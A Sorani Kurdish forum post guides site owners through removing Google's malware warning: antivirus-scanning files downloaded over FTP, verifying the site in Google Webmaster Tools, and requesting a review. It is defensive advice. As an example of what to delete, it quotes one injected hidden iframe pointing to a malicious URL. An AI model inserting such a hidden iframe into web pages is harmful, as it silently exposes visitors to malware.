بابه‌ت: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له ماڵپه‌ڕدا
سڵاو،
پاش ئه‌وه‌ی كه ژماره‌یه‌ك ماڵپه‌ڕ تووشی ئه‌و كێشه‌یه بوون، به پێویستم زانی ئه‌و هه‌نگاوانه ئاماژه پێبده‌م كه پێویستن وه‌ك خاوه‌ن ماڵپه‌ڕ جێبه‌جێیان بكه‌یت بۆ سڕینه‌وه‌ی ئه‌و په‌یامه‌ی كه گوایه ماڵپه‌ڕه‌كه‌ت ڤایرۆس، كۆدی زیانبه‌خش بڵاو ده‌كاته‌وه.
سه‌ره‌تا، ئایا هۆكاری درووستبوونی ئه‌و كێشه‌یه چیه؟
١، ماڵپه‌ڕه‌كه‌ت ڤایرۆس یان كۆدی زیانبه‌خشی تێدایه.
٢، ماڵپه‌ڕه‌كه‌ت له‌سه‌ر ڕاژهكارێكه كه ڤایرۆسی له خۆ گرتووه.
٣، ماڵپه‌ڕه‌كه‌ت له‌سه‌ر ڕاژهكارێكه كه زۆر ماڵپه‌ڕی له‌سه‌ره كه هه‌مان كێشه‌یان هه‌یه.

واته مه‌رج نیه به بوونی ئه‌و په‌یامه، ماڵپه‌ڕه‌كه‌ت ڤایرۆسی تێدا بێت.
چۆنیه‌تی چاره‌سه‌ركردنی،
به شێوه‌یه‌كی گشتیی هه‌موو ئه‌و ماڵپه‌ڕانه كه ئه‌م په‌یامه‌یان له‌سه‌ر پیشان ده‌درێت، ده‌كرێت به ١ شێواز چاره‌سه‌ر بكرێن.
هه‌نگاوه‌كانی چاره‌سه‌ركردن،
١، دژه‌ڤایرۆسێكی چاك (من Dr.Web ــم پێ باشه) له نێو كۆمپیوته‌ره‌كه‌ت دابمه‌زرێنه، دواتر هه‌موو په‌ڕه و په‌ڕگه‌كانی ماڵپه‌ڕه‌كه‌ت له رێی FTP ـه‌وه دابگره و به‌و دژه ڤایرۆسه چێكیان بكه، ئه‌گه‌ر ڤایرۆس دۆزرایه‌وه چاره‌سه‌ری بكه.
٢، هه‌ژمارێك له گووگڵ بكه‌وه ئه‌گه‌ر تا ئیستا نیته،
https://www.google.com/accounts/NewAcco … &hl=en
ئه‌گه‌ر هه‌ته، كرته لێره بكه و بچۆ ژووره‌وه بۆ نێو Google Webmaster Tools،
http://www.google.com/webmasters/tools
له‌م هه‌نگاوه‌دا ماڵپه‌ڕه‌كه‌ت ده‌نێرێت بۆ گووگڵ بۆ چاولێكردن بۆ ئه‌وه‌ی كه بیسلهمێنیت كه ماڵپه‌ڕه‌كه‌ت ڤایرۆسی تیدا نیه و ئه‌وه‌ش ده‌بێته هۆكاری سڕینه‌وه‌ی ئه‌و په‌یامه.
كرته بكه نێو ئه‌و خانه‌یه كه نووسراوه،
Click Here To Add a Site و له‌وێدا به‌سته‌ری ماڵپه‌ڕه‌كه‌ت بنووسه، بۆ نموونه www.domain.com یان domain.com.

دواتر ده‌بێ ماڵپه‌ڕه‌كه‌ت Verify بكه‌یت، كرته بكه سه‌ر Verify Your Website،

ده‌توانی به ٢ شێواز ماڵپه‌ڕه‌كه‌ت Verify بكه‌یت، ده‌توانی شێوازی باركردنی په‌ڕه‌یه‌كی HTML ی هه‌ڵبژێریت،
Upload an HTML file.

له ژێر ئه‌وه هه‌ڵبژاردنه‌دا، شتێكی وه‌ك ئه‌مه ده‌رده‌چێت، googleexxxxxxd0ca9d2f.html، پێویسته په‌ڕه‌یه‌كی به‌تاڵی HTML درووست بكه‌یت و به‌و ناوه پاشه‌كه‌وتی بكه‌یت، (تكایه ئه‌و ناوه به‌كار ببه كه بۆ خۆت ده‌ركه‌وتووه، نه‌ك ئه‌وه‌ی كه من دامناوه).
له هه‌ر پرۆگرامێكی نووسین بێت ده‌توانی ئه‌و كاره بكه‌یت، بۆ نموونه Notepad یان Frontpage، په‌ڕه‌یه‌كی نوێ و به‌تاڵ بكه‌وه، دواتر ڕاسته‌وخۆ پاشه‌كه‌وتی بكه و ئه‌و ناوه‌ی بۆ بنووسه كه گووگڵ پێی پێشنیار كردیت.
پاشان له ڕێی FTP ـه‌وه باری بكه نێو ماڵپه‌ڕه‌كه‌ت، دواتر كرته له‌سه‌ر دووگمه‌ی Verify بكه، ئه‌گه‌ر هه‌موو هه‌نگاوه‌كانت به درووستی جێبه‌جێ كردبێت، ده‌بێت په‌یامی You've successfully verified http://domain.com ببینیت. ئه‌گه‌ر وانه‌بوو، تكایه چاوێك به هه‌نگاوه‌كاندا بخشێنه‌وه.
له سه‌ر هه‌مان په‌ڕه‌ی سه‌ره‌تا، په‌یامێك ده‌بینی كه تێدا ئاماژه به‌وه دراوه كه ماڵپه‌ڕه‌كه‌ت/ به‌شێك له ماڵپه‌ڕه‌كه‌ت، كێشه‌ی ناوبراوی تێدایه و ده‌توانی زانیاریی له‌سه‌ر بخوێنیته‌وه یان داوای دووباره چاوپێداخشانه‌وه بكه‌یت، لێره‌دا ده‌ته‌وێت داواكاریی دووباره جاوپێدا خشانه‌وه بنێریت بۆ گووگڵ، بۆیه كرته له Request a review ده‌كه‌یت.
گرینگه كه تێبین ئه‌وه بكه‌یت ئه‌و په‌ڕانه‌ی كه گووگڵ ده‌ڵێت زیانبه‌خشن (ئیمكانی زۆری هه‌یه) كه وابن، بۆیه ده‌بێت چاوی لێبكه‌یت و كێشه‌كه‌ی بدۆزیه‌وه، بۆ نموونه ئه‌م ماڵپه‌ڕه له نێو كۆده‌كانی دا ئه‌م كۆده هه‌بوو،
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>كه به‌سته‌ر ده‌كات بۆ په‌ڕه‌یه‌كی زیانبه‌خش.
بۆیه ده‌بێت بسڕێته‌وه پێش ناردنی داواكاری چاوپێدا خشاندنه‌وه.
ئه‌گه‌ر هه‌موو هه‌نگاوه پێویسته‌كان جێبه‌جێ كراون،
I certify that I have removed badware or badware links from my site, according to StopBadware.org's Security Tips For Websites
چالاك بكه و دواتر كرته له دووگمه‌ی Request a review بكه.

به‌و شێوه‌یه هه‌نگاوه‌كان كۆتاییان پێدێت، ده‌بێ ماوه‌ی ٢٤ كاتژمێر یان زۆرتر چاوه‌ڕوانبیت بۆ ئه‌وه‌ی ئه‌وه‌ی ئه‌نجامی هه‌بێت.
كۆتایی.